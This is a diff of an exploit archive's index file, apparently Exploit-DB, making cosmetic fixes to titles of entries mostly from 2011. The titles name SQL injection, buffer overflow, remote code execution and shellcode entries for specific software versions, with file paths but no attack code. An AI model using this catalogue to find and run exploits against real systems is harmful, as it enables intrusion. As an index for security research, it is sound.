-17465,platforms/php/webapps/17465.txt,"Wordpress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",php,webapps,0 +17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection",2011-07-01,"SEC Consult",php,webapps,0 17466,platforms/php/webapps/17466.txt,"Ollance Member Login Script - Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps,0 17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow",2011-07-01,Metasploit,windows,remote,5555 17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)",2011-07-02,"muts and dookie",windows,remote,5555 17471,platforms/windows/dos/17471.py,"Donar Player 2.8.0 - Denial of Service",2011-07-03,X-h4ck,windows,dos,0 17472,platforms/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 17473,platforms/windows/local/17473.txt,"Adobe Reader X 10.0.0 < 10.0.1 - Atom Type Confusion Exploit",2011-07-03,Snake,windows,local,0 -17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - .RTF Header Stack Overflow",2011-07-03,Snake,windows,local,0 +17474,platforms/windows/local/17474.txt,"Microsoft Office 2010 - '.RTF' Header Stack Overflow",2011-07-03,Snake,windows,local,0 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 -17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server 7.0 - Stack Exhaustion Denial of Service (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",windows,dos,0 +17476,platforms/windows/dos/17476.rb,"Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",windows,dos,0 17477,platforms/php/webapps/17477.txt,"phpDealerLocator - Multiple SQL Injections",2011-07-03,"Robert Cooper",php,webapps,0 17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection",2011-07-03,Bellatrix,asp,webapps,0 @@ -15198,15 +15199,15 @@ id,file,description,date,author,platform,type,port 17484,platforms/php/webapps/17484.txt,"DmxReady Links Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,php,webapps,0 17485,platforms/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,php,webapps,0 17486,platforms/multiple/local/17486.php,"PHP 5.3.6 - Buffer Overflow PoC (ROP)",2011-07-04,"Jonathan Salwan",multiple,local,0 -17487,platforms/php/webapps/17487.php,"WeBid 1.0.2 - (converter.php) Remote Code Execution Exploit",2011-07-04,EgiX,php,webapps,0 +17487,platforms/php/webapps/17487.php,"WeBid 1.0.2 - (converter.php) Remote Code Execution",2011-07-04,EgiX,php,webapps,0 17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)",2011-07-04,extraexploit,windows,local,0 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow (Metasploit)",2011-07-04,"James Fitts",windows,local,0 17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow",2011-07-04,Metasploit,windows,remote,0 -17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - (.ord) Buffer Overflow (Metasploit)",2011-07-05,"James Fitts",windows,local,0 +17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - '.ord' Buffer Overflow (Metasploit)",2011-07-05,"James Fitts",windows,local,0 17491,platforms/unix/remote/17491.rb,"vsftpd 2.3.4 - Backdoor Command Execution",2011-07-05,Metasploit,unix,remote,0 17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection",2011-07-05,Bellatrix,asp,webapps,0 17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - '.zip' Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 -17495,platforms/php/webapps/17495.txt,"BbZL.php - File Inclusion Exploit",2011-07-06,"Number 7",php,webapps,0 +17495,platforms/php/webapps/17495.txt,"BbZL.php - File Inclusion",2011-07-06,"Number 7",php,webapps,0 17496,platforms/php/webapps/17496.txt,"Joomla 1.6.3 - Cross-Site Request Forgery Exploit",2011-07-06,"Luis Santana",php,webapps,0 17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 - ASX Playlist File Handling Buffer Overflow",2011-07-06,LiquidWorm,windows,dos,0 17498,platforms/windows/remote/17498.rb,"Freefloat FTP Server - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,remote,0 @@ -15219,7 +15220,7 @@ id,file,description,date,author,platform,type,port 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,80 39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,Metasploit,windows,remote,21 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 -17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0 +17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution",2011-07-08,wofeiwo,php,webapps,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0 17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - '.zip' Heap Overflow",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow",2011-07-09,Metasploit,windows,remote,0 @@ -15230,7 +15231,7 @@ id,file,description,date,author,platform,type,port 17519,platforms/windows/remote/17519.py,"Freefloat FTP Server - (LIST command) Buffer Overflow",2011-07-10,"Zer0 Thunder",windows,remote,0 17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (1)",2011-07-10,Metasploit,windows,remote,0 17522,platforms/php/webapps/17522.txt,"Fire Soft Board 2.0.1 - Persistent Cross-Site Scripting (Admin Panel)",2011-07-12,"_jill for A-S",php,webapps,0 -17523,platforms/php/webapps/17523.txt,"Tradingeye E-commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 +17523,platforms/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 17525,platforms/php/webapps/17525.txt,"Xmap 1.2.11 Joomla Component - Blind SQL Injection",2011-07-12,jdc,php,webapps,0 17527,platforms/windows/remote/17527.py,"Solar FTP 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0 @@ -15241,19 +15242,19 @@ id,file,description,date,author,platform,type,port 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection",2011-07-14,LiquidWorm,php,webapps,0 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,php,webapps,0 17535,platforms/multiple/remote/17535.rb,"Java RMI - Server Insecure Default Configuration Java Code Execution",2011-07-15,Metasploit,multiple,remote,0 -40085,platforms/windows/local/40085.rb,"Windows 7 SP1 - mrxdav.sys WebDav Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0 +40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - mrxdav.sys WebDav Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0 17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,Metasploit,windows,remote,0 -17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 - MKD Buffer Overflow",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 +17539,platforms/windows/remote/17539.rb,"Freefloat FTP Server 1.00 - MKD Buffer Overflow",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server - MKD Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0 17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow",2011-07-17,Metasploit,windows,remote,0 17544,platforms/windows/dos/17544.txt,"GDI+ - CreateDashedPath Integer Overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0 -17546,platforms/windows/remote/17546.py,"FreeFloat FTP Server 1.0 - REST & PASV Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 +17546,platforms/windows/remote/17546.py,"Freefloat FTP Server 1.0 - REST & PASV Buffer Overflow",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 17553,platforms/php/webapps/17553.txt,"Appointment Booking Pro Joomla Component - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0 -17548,platforms/windows/remote/17548.rb,"FreeFloat FTP Server - REST Buffer Overflow (Metasploit)",2011-07-19,KaHPeSeSe,windows,remote,0 +17548,platforms/windows/remote/17548.rb,"Freefloat FTP Server - REST Buffer Overflow (Metasploit)",2011-07-19,KaHPeSeSe,windows,remote,0 17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,Unknown,multiple,dos,0 -17550,platforms/windows/remote/17550.py,"FreeFloat FTP Server 1.0 - ACCL Buffer Overflow",2011-07-19,mortis,windows,remote,0 +17550,platforms/windows/remote/17550.py,"Freefloat FTP Server 1.0 - ACCL Buffer Overflow",2011-07-19,mortis,windows,remote,0 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0 17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0 17556,platforms/php/webapps/17556.txt,"Joomla Component JE K2 Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0 @@ -15272,10 +15273,10 @@ id,file,description,date,author,platform,type,port 17571,platforms/php/webapps/17571.txt,"OpenX Ad Server 2.8.7 - Cross-Site Request Forgery",2011-07-26,"Narendra Shinde",php,webapps,0 17572,platforms/multiple/webapps/17572.txt,"ManageEngine ServiceDesk Plus 8.0.0 Build 8013 - Improper User Privileges",2011-07-26,"Narendra Shinde",multiple,webapps,0 17573,platforms/php/webapps/17573.txt,"PHP-Barcode 0.3pl1 - Remote Code Execution",2011-07-26,beford,php,webapps,0 -17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 - SVG Remote Code Execution Exploit (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0 +17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",cgi,webapps,0 -17578,platforms/windows/remote/17578.txt,"MinaliC Webserver 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 -17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart 1.1.7 - Blind time-based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0 +17578,platforms/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 +17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart 1.1.7 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0 17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos,0 17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0 17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 @@ -15287,38 +15288,38 @@ id,file,description,date,author,platform,type,port 17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,php,webapps,0 -17593,platforms/php/webapps/17593.txt,"Zoneminder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0 +17593,platforms/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) - SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC - Credential Information Disclosure",2011-08-01,Metasploit,jsp,webapps,0 17597,platforms/php/webapps/17597.txt,"SiteGenius - Blind SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",windows,dos,0 -17602,platforms/php/webapps/17602.txt,"Wordpress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0 +17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0 17603,platforms/php/webapps/17603.txt,"Joomla Component (com_jdirectory) - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0 17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 17606,platforms/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,multiple,webapps,0 -17607,platforms/windows/local/17607.rb,"FreeAmp 2.0.7 - (.fat) Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 +17607,platforms/windows/local/17607.rb,"FreeAmp 2.0.7 - '.fat' Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 17610,platforms/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",multiple,dos,0 17611,platforms/linux/local/17611.pl,"Unrar 3.9.3 - Local Stack Overflow",2011-08-05,ZadYree,linux,local,0 -17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit)",2011-08-05,Rh0,windows,remote,0 -17613,platforms/php/webapps/17613.php,"Wordpress Plugin E-commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,php,webapps,0 +17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)",2011-08-05,Rh0,windows,remote,0 +17613,platforms/php/webapps/17613.php,"WordPress Plugin E-Commerce 3.8.4 - SQL Injection",2011-08-05,IHTeam,php,webapps,0 17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector (HP-UX) - Remote Shell",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0 17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server - Authenticated Code Execution",2011-08-05,Metasploit,jsp,webapps,0 -17616,platforms/php/webapps/17616.txt,"Wordpress ProPlayer plugin 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 -17617,platforms/php/webapps/17617.txt,"Wordpress Social Slider plugin 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 +17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 +17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server Denial of Service (Write command)",2011-08-05,"SecPod Research",windows,dos,0 17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",windows,remote,0 17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 -17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 - session hijacking",2011-08-07,seth,php,webapps,0 -17627,platforms/php/webapps/17627.txt,"Wordpress UPM Polls plugin 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 -17628,platforms/php/webapps/17628.txt,"Wordpress Media Library Categories plugin 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 +17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 - session Hijacking",2011-08-07,seth,php,webapps,0 +17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 +17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 -17630,platforms/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 +17630,platforms/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17633,platforms/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0 17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass Exploit",2011-08-07,"C4SS!0 G0M3S",windows,local,0 -17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Path Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 +17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL - Query Execution (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0 17638,platforms/windows/dos/17638.py,"LiteServe 2.81 - PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 17639,platforms/php/webapps/17639.txt,"XpressEngine 1.4.5.7 - Persistent Cross-Site Scripting",2011-08-08,v0nSch3lling,php,webapps,0 @@ -15345,26 +15346,26 @@ id,file,description,date,author,platform,type,port 17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x - (4.6.5) SQL Injection",2011-08-13,"Aung Khant",php,webapps,0 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos,0 -17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 +17667,platforms/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use-After-Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0 -17673,platforms/php/webapps/17673.txt,"Wordpress IP-Logger Plugin 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 +17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component - Local File Inclusion",2011-08-17,NoGe,php,webapps,0 17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0 17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)",2011-08-17,0in,windows,dos,0 -17677,platforms/php/webapps/17677.txt,"Wordpress File Groups plugin 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17678,platforms/php/webapps/17678.txt,"Wordpress Contus HD FLV Player plugin 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17679,platforms/php/webapps/17679.txt,"Wordpress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17680,platforms/php/webapps/17680.txt,"Wordpress Easy Contact Form Lite Plugin 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17681,platforms/php/webapps/17681.txt,"Wordpress OdiHost Newsletter plugin 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 -17682,platforms/php/webapps/17682.php,"Contrexx Shopsystem 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 -17683,platforms/php/webapps/17683.txt,"Wordpress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17684,platforms/php/webapps/17684.txt,"Wordpress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17677,platforms/php/webapps/17677.txt,"WordPress File Groups plugin 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17678,platforms/php/webapps/17678.txt,"WordPress Contus HD FLV Player plugin 1.3 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17679,platforms/php/webapps/17679.txt,"WordPress Plugin Symposium 0.64 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17680,platforms/php/webapps/17680.txt,"WordPress Easy Contact Form Lite Plugin 1.0.7 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17681,platforms/php/webapps/17681.txt,"WordPress OdiHost NewsLetter plugin 1.0 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0 +17682,platforms/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 +17683,platforms/php/webapps/17683.txt,"WordPress Plugin DS FAQ 1.3.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17684,platforms/php/webapps/17684.txt,"WordPress Plugin Forum 1.7.8 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17685,platforms/php/webapps/17685.txt,"Elgg 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 -17686,platforms/php/webapps/17686.txt,"Wordpress Ajax Gallery plugin 3.0 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17687,platforms/php/webapps/17687.txt,"Wordpress Global Content Blocks plugin 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17688,platforms/php/webapps/17688.txt,"Wordpress Allow PHP in Posts and Pages plugin 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17689,platforms/php/webapps/17689.txt,"Wordpress Menu Creator plugin 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17686,platforms/php/webapps/17686.txt,"WordPress Ajax Gallery plugin 3.0 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17687,platforms/php/webapps/17687.txt,"WordPress Global Content Blocks plugin 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17688,platforms/php/webapps/17688.txt,"WordPress Allow PHP in Posts and Pages plugin 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 +17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution",2011-08-19,Metasploit,multiple,remote,0 17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,windows,remote,0 17695,platforms/php/webapps/17695.txt,"phpMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0 @@ -15374,110 +15375,110 @@ id,file,description,date,author,platform,type,port 17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup - Authentication Bypass/Command Injection",2011-08-19,Metasploit,php,webapps,0 17699,platforms/windows/remote/17699.rb,"Symantec System Center Alert Management System - 'xfr.exe' Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 17700,platforms/windows/remote/17700.rb,"Symantec System Center Alert Management System - 'hndlrsvc.exe' Arbitrary Command Execution",2011-08-19,Metasploit,windows,remote,0 -17702,platforms/php/webapps/17702.rb,"Wordpress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 +17702,platforms/php/webapps/17702.rb,"WordPress Block-Spam-By-Math-Reloaded Plugin - Bypass",2011-08-20,"Tiago Ferreira and Heyder Andrade",php,webapps,0 17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) - Persistent Cross-Site Scripting",2011-08-20,"Eyup CELIK",php,webapps,0 -17704,platforms/php/webapps/17704.txt,"Wordpress UnGallery plugin 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 +17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin 1.5.8 - Local File Disclosure",2011-08-20,"Miroslav Stampar",php,webapps,0 17705,platforms/php/webapps/17705.txt,"EasySiteEdit - Remote File Inclusion",2011-08-21,"koskesh jakesh",php,webapps,0 17706,platforms/php/webapps/17706.pl,"onefilecms 1.1.1 - Multiple Vulnerabilities",2011-08-21,mr.pr0n,php,webapps,0 -17707,platforms/php/webapps/17707.txt,"Wordpress MM Duplicate plugin 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",php,webapps,0 +17707,platforms/php/webapps/17707.txt,"WordPress MM Duplicate plugin 1.2 - SQL Injection",2011-08-22,"Miroslav Stampar",php,webapps,0 17708,platforms/php/webapps/17708.txt,"Web Solutions Wcs2u - SQL Injection",2011-08-22,tempe_mendoan,php,webapps,0 17709,platforms/php/webapps/17709.txt,"Bonza Digital Cart Script - SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 17710,platforms/php/webapps/17710.txt,"DV Cart Shopping Cart software - SQL Injection",2011-08-22,"Eyup CELIK",php,webapps,0 17711,platforms/asp/webapps/17711.txt,"Redlab CMS - Multiple SQL Injections",2011-08-22,tempe_mendoan,asp,webapps,0 -17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - .gif Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 +17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 17713,platforms/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-08-23,LiquidWorm,jsp,webapps,0 17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g - Cross-Site Request Forgery (add admin)",2011-08-24,G13,php,webapps,0 17715,platforms/windows/local/17715.html,"F-Secure Multiple Products - ActiveX SEH Overwrite (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 -17716,platforms/php/webapps/17716.txt,"Wordpress SendIt plugin 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0 +17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin 1.5.9 - Blind SQL Injection",2011-08-25,evilsocket,php,webapps,0 17718,platforms/windows/dos/17718.pl,"Groovy 